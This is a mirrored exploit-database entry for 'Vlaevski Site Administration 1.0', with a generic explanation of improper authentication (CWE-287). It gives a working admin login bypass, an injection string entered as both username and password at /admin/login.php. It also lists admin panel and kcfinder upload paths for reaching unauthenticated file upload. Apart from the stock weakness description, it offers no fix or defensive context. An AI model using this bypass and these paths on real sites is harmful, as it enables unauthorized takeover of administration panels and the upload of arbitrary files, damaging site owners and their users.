Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080037

Below is a copy:

Powered By Vlaevski Site Administration 1.0 Improper Authentication File Upload Vulnerability
####################################################################

# Exploit Title : Powered By Vlaevski Site Administration 1.0 Improper Authentication File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/08/2019
# Vendor Homepage : vlaevski.com - scandinavia.bg
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Authentication is any process by which a system verifies the identity of a user 
who wishes to access it.
When an actor claims to have a given identity, the software does not prove or insufficiently
proves that the claim is correct and besides it allows upload a file on the system 
without administrator permission.
Improper authentication occurs when an application improperly verifies the identity of a user.
A software incorrectly validates user's login information and as a result, an attacker can 
gain certain privileges within the application or disclose sensitive information that allows 
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.

####################################################################

# Authentication Bypass / Admin Panel Login Bypass Exploit :
******************************************************
2014  Site Administration v1.0. Powered by Vlaevski.com

Admin Panel Login Path : 
/admin/login.php

Admin Username : '=''or'
Admin Password : '=''or'

/admin/index.php
/admin/kcfinder/browse.php
/admin/kcfinder/upload/files/....
/admin/index.php?page=menu_list
/admin/index.php?page=menu_pics_list
/admin/index.php?page=adm_users
/admin/index.php?page=adm_users&edit=
/?page=main&cat=[ID-NUMBER]

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.